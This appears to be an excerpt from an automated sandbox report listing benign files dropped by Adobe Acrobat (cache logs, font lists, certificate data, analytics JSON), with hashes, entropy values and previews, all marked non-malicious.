                          Preview:*...#................version.1..namespace-e...o................next-map-id.1.Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/.0y.S_r................next-map-id.2.Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/.16.X:r................next-map-id.3.Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/.2.P.@o................next-map-id.4.Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/.346.+^...............Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/....^...............Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/..?&a...............Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/_...a...............Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/...o................next-map-id.5.Pnamespace-07af9ee9_2076_4f12_94b5_
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:ASCII text
                          Category:dropped
                          Size (bytes):322
                          Entropy (8bit):5.166172123868359
                          Encrypted:false
                          SSDEEP:
                          MD5:CFBA7E5D054F9D7502266F0E39D00CC0
                          SHA1:B34CFEE3FA27FADF2C179314D637A0671A101604
                          SHA-256:1BCBB9A1F2E4DBF2F8204556CDD1A9189A29E4681F8F52E9615AA3AE7C8E801E
                          SHA-512:7E107674DE8E70DE3D2B3A4B8DA2DF503C8F675E1875A60CBA18CFBE53F1B35CC9E37172175F137F5AA1AA4DAAA58F456710FC2DF6580680783E7525B95CCDF8
                          Malicious:false
                          Reputation:unknown
                          Preview:2024/11/12-10:23:07.197 1978 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/11/12-10:23:07.198 1978 Recovering log #3.2024/11/12-10:23:07.200 1978 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                          Category:dropped
                          Size (bytes):65110
                          Entropy (8bit):0.6984981473111966
                          Encrypted:false
                          SSDEEP:
                          MD5:682F2192C2752CC563827297A99810D7
                          SHA1:EA9591875D35C407F877940856907B1621BF3456
                          SHA-256:E97481FDF7752059F28BF3B1768A76F727C7460C6D4B051F0A104F1A9F919592
                          SHA-512:A6ACE9D9E6863F2FD47C1D4299C6AFB2DDC17AB18463CAAC0B32B357DCAA58D7799C5B8CD7F409B7DF013373EC58C3D197B1AB7AA2F7D73F8D6672CDAA678DA5
                          Malicious:false
                          Reputation:unknown
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 2, database pages 14, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                          Category:dropped
                          Size (bytes):57344
                          Entropy (8bit):3.291927920232006
                          Encrypted:false
                          SSDEEP:
                          MD5:A4D5FECEFE05F21D6F81ACF4D9A788CF
                          SHA1:1A9AC236C80F2A2809F7DE374072E2FCCA5A775C
                          SHA-256:83BE4623D80FFB402FBDEC4125671DF532845A3828A1B378D99BD243A4FD8FF2
                          SHA-512:FF106C6B9E1EA4B1F3E3AB01FAEA21BA24A885E63DDF0C36EB0A8C3C89A9430FE676039C076C50D7C46DC4E809F6A7E35A4BFED64D9033FEBD6121AC547AA5E9
                          Malicious:false
                          Reputation:unknown
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:SQLite Rollback Journal
                          Category:dropped
                          Size (bytes):16928
                          Entropy (8bit):1.2142843970659385
                          Encrypted:false
                          SSDEEP:
                          MD5:2DF1837C1233DD8D6F32BA54709D54C1
                          SHA1:BAC6E5DBB37530FAD317AC3AD6AFCE99B18903A9
                          SHA-256:E4C3400702FECAA8C6B35C8081197B71595A24E19A47758435FE7BD7E3192CB8
                          SHA-512:E98D12E4EE494B77C1DE4C7D6D9335F1572821D777A82B9D6977A5AB16FDF0E2B0295911447C66DC908D9860C2DE57C5C342EB40734FFE445AE4515C3E5B66DA
                          Malicious:false
                          Reputation:unknown
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:Certificate, Version=3
                          Category:dropped
                          Size (bytes):1391
                          Entropy (8bit):7.705940075877404
                          Encrypted:false
                          SSDEEP:
                          MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                          SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                          SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                          SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                          Malicious:false
                          Reputation:unknown
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                          Category:dropped
                          Size (bytes):71954
                          Entropy (8bit):7.996617769952133
                          Encrypted:true
                          SSDEEP:
                          MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                          SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                          SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                          SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                          Malicious:false
                          Reputation:unknown
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):192
                          Entropy (8bit):2.732136534099206
                          Encrypted:false
                          SSDEEP:
                          MD5:FEBA6513646D3831CA397A7BC8D8CDA4
                          SHA1:0AB013E4E344CAA802E124E3F33CAC177CF46CBD
                          SHA-256:684CE7188672EB405ED5EC45AFCD255529BA7945003A5155CE7A0C98EC212955
                          SHA-512:002FBB6FB77A0319DB3E7844B7370B65AC99B2C5EA21D2BD00C8DE84DDBE88377C40CE3669592F296F08EA441E809A80A74BC1513F76E4B9D14F0E9280B01652
                          Malicious:false
                          Reputation:unknown
                          Preview:p...... .............5..(....................................................... ..........W....1...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:data
                          Category:modified
                          Size (bytes):328
                          Entropy (8bit):3.247897867253901
                          Encrypted:false
                          SSDEEP:
                          MD5:222C801B5593FEE6159521CA718FED30
                          SHA1:F5B550278D54A1DC8BAC69D398B422D9694E1A26
                          SHA-256:C229E6612583CD1D372F3E0B83773800B54DE973289BE3FF817902BDDF2C69E3
                          SHA-512:8DEA50B1DC7223C80EBFB114B879F413BEADC32E4ADAD1A8ADAC032F3ACC421D3FE613B3B6375ECF741E259E0D3FF0F08FF84774C09F033C55D15DC00422FBEE
                          Malicious:false
                          Reputation:unknown
                          Preview:p...... .........,N..5..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:PostScript document text
                          Category:dropped
                          Size (bytes):0
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:
                          MD5:8BA9D8BEBA42C23A5DB405994B54903F
                          SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                          SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                          SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                          Malicious:false
                          Reputation:unknown
                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:PostScript document text
                          Category:dropped
                          Size (bytes):1233
                          Entropy (8bit):5.233980037532449
                          Encrypted:false
                          SSDEEP:
                          MD5:8BA9D8BEBA42C23A5DB405994B54903F
                          SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                          SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                          SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                          Malicious:false
                          Reputation:unknown
                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:PostScript document text
                          Category:dropped
                          Size (bytes):0
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:
                          MD5:8BA9D8BEBA42C23A5DB405994B54903F
                          SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                          SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                          SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                          Malicious:false
                          Reputation:unknown
                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:PostScript document text
                          Category:dropped
                          Size (bytes):0
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:
                          MD5:B60EE534029885BD6DECA42D1263BDC0
                          SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                          SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                          SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                          Malicious:false
                          Reputation:unknown
                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:PostScript document text
                          Category:dropped
                          Size (bytes):10880
                          Entropy (8bit):5.214360287289079
                          Encrypted:false
                          SSDEEP:
                          MD5:B60EE534029885BD6DECA42D1263BDC0
                          SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                          SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                          SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                          Malicious:false
                          Reputation:unknown
                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):295
                          Entropy (8bit):5.354723308837573
                          Encrypted:false
                          SSDEEP:
                          MD5:D2AA57A6259632D430E266B068506E0D
                          SHA1:319A26276D135A07F44B495FF33E93DE34F7BA47
                          SHA-256:CC8601F767817E3A925441B533B5348EEEA212CFBCA59FF72FAC243D3552B991
                          SHA-512:7EDC9B2DD29E8955EBBA43B560A80ACD8A031AA2B89EA5C871A0C9B45465D85DCE15BBF4BAB4444EC0DCE3542503F9FEE2C1DE5A1A60C9DD8E68477D28291D25
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"fd26481e-6db8-4aeb-a9ef-be88c40b46e4","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1731604993084,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):294
                          Entropy (8bit):5.299237470447495
                          Encrypted:false
                          SSDEEP:
                          MD5:EB9E271DCCB4AE8952AA229A3861B2EB
                          SHA1:3D49C54D6953C59D503A69D6F7E45C7B88A08ACC
                          SHA-256:D6B35124D26ED03B1E61D65EEC866AF7F3A2DED7EE4680C486715C197D1A6806
                          SHA-512:FA159A279E5AF65BE2D7793860CC4EEED4CACF57255AFCBAAAA8E8F9FAD78C10EE0EAB3A2B2AC64AC9BCD6DB9DEF4896598A08045B8A919F2CB4081E34BA8AC3
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"fd26481e-6db8-4aeb-a9ef-be88c40b46e4","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1731604993084,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):294
                          Entropy (8bit):5.279009112155158
                          Encrypted:false
                          SSDEEP:
                          MD5:06139A70E298A329B7CFC68908F4F411
                          SHA1:548F6C1223320CE83ABFB7286F67BB4193E1EC54
                          SHA-256:7841C448E1EBA48B7F4092E3E964DBD77464579ECB40817ADD9CDDC0108983A9
                          SHA-512:73C0CBCB609B8AD9A39738FFBEF70C29A8D5EF3588E0B88ABD5C9A57657BEBA824688B07BD8FB91BE79543DC47F455BD7BC217F8AFA5D5A4B232542A1DA7C9D0
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"fd26481e-6db8-4aeb-a9ef-be88c40b46e4","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1731604993084,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):285
                          Entropy (8bit):5.342800336965249
                          Encrypted:false
                          SSDEEP:
                          MD5:7A57347BA1649D75D10CA515D97628F4
                          SHA1:FEEDFDE6422FD5F974F0E7A5EE318F3677C29313
                          SHA-256:2B41204313F10003013EBFE1D9C3E9099F5D45531B9D6DDD6EF6597370E1535A
                          SHA-512:49BEE3A5D4398ABCFE762F3D770597BAD5A8337FE57D27AAE45095A876FA3E93603519DEDD39B57BA3225A65095324B17A5C3370DC713EB478E66D46FB07D9FE
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"fd26481e-6db8-4aeb-a9ef-be88c40b46e4","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1731604993084,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):1123
                          Entropy (8bit):5.681815726057597
                          Encrypted:false
                          SSDEEP:
                          MD5:5C2C6411A4BC7E49CADC1A3494EA8A78
                          SHA1:3C64BFB59D858B3027FE4E93447DB94DB98134D6
                          SHA-256:02F1338FBC16A6B3BE8A8545D6F1F50BF81304B48A4BF9CF9CCB9CCF4DB99B98
                          SHA-512:281C9A59A0A987BE0453C3C052BED79CD230574475BFB07B3F4EC5C2E61C3565B4DEE202C83DC6D3BB6896E12F2DA54B1CDDCD57B6E93C94BCECD4E858D530EC
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"fd26481e-6db8-4aeb-a9ef-be88c40b46e4","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1731604993084,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):1122
                          Entropy (8bit):5.67715421240136
                          Encrypted:false
                          SSDEEP:
                          MD5:497D83F5A6EF74B4BF7810EC86D04AF7
                          SHA1:1528611461FA8E7148B504D31B1D2FA03ACF471D
                          SHA-256:459DEB4765D72152A3F1125A4BDB2DF0DC40B81D0AE45F012775CE7E52497002
                          SHA-512:C62977731760D68E280E60BEE6972B442213ED9E58875F51328D34E93A3AF09AAC5DE189D491B64A028C82C4A51A3DD4C216548872AFC18289588A7F113C7ECA
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"fd26481e-6db8-4aeb-a9ef-be88c40b46e4","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1731604993084,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Disc_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93181_288855ActionBlock_0","campaignId":93181,"containerId":"1","controlGroupId":"","treatmentId":"1aad653c-ef44-43f7-be1c-3a2ba2cf2cfc","variationId":"288855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Disc_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQsIGVkaXQgYW5kIGUtc2lnblxuIFBERiBmb3JtcyAmIGFncmVlbWVudHMuIn0sInRjY
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):292
                          Entropy (8bit):5.289753297015938
                          Encrypted:false
                          SSDEEP:
                          MD5:8043C1369FEBEF5C7228072D500F28CE
                          SHA1:C5A6DB946F0B76F0669BED86B1B8979CD1FFC7B0
                          SHA-256:8CCBC06CBBC98E368E5FE04C8D0923FB7CC74A2BEB9E3131F90BD01F0DCFB908
                          SHA-512:49B62582A58E84AC31DBAB9B5DB3E98102FC23E08B5059D87BE2D43808A6329F3F237A521C2A5DBD7EDF51E101201EE2E8E9364B957D441423D0F8EFDBEDDAD1
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"fd26481e-6db8-4aeb-a9ef-be88c40b46e4","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1731604993084,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):1102
                          Entropy (8bit):5.668428569977861
                          Encrypted:false
                          SSDEEP:
                          MD5:532744D55F5A033D7E3BFF3B6D079ADB
                          SHA1:D0345D40534263F95370C280BF6AB93DFF9B202A
                          SHA-256:38601B9F70CDB4D403F33219C769426F3FAB030A1D680AB4DA589893201C17B6
                          SHA-512:A61BBA37E39D59C67244A624FF3F0F299C3E6AC6DB7F7DA4511C3893DBC859AE857B3FC385DFD7F47D36EFA98523F74C0A74B03D81FD5B0E4F98AE1E3A5B41F3
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"fd26481e-6db8-4aeb-a9ef-be88c40b46e4","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1731604993084,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93181_288855ActionBlock_1","campaignId":93181,"containerId":"1","controlGroupId":"","treatmentId":"533ab5eb-b236-4889-89a5-ac002261d71e","variationId":"288855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkVkaXRQREZSZHJBcHBGdWxsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTRweCIsImZvbnRfc3R5bGUiOiIwIn0sImRlc2NyaXB0aW9uX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTJweCIsImZvbnRfc3R5bGUiOiItMSJ9LCJ0aXRsZSI6bnVsbCwiZGVzY3JpcHRpb24iOiJFZGl0IHRleHQsIGltYWdlcywgcGFnZXMsIGFuZCBtb3JlLiJ9LCJ0Y2F0SWQiOm51bGx9","da
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):1164
                          Entropy (8bit):5.696613101711443
                          Encrypted:false
                          SSDEEP:
                          MD5:88ECD6A503FE8FF51B505632A9448C75
                          SHA1:82E3936E2A1E6B67C0CE4DF8334E52E157C7B380
                          SHA-256:848513DE524150345BE3D25265E46488FECAA7C561EC9F2B53FC45ED96AD85CA
                          SHA-512:CD91114F17F75BA543772DF5C806AE0B3ABBE6A401A0CA9F76FFA5758B47AAC0CC1D93A2348B75E22AD6E618E0E0E9B0E463E6DE777B0BC530E4C660F1C7CC27
                          Malicious:false
                          Reputation:unknown
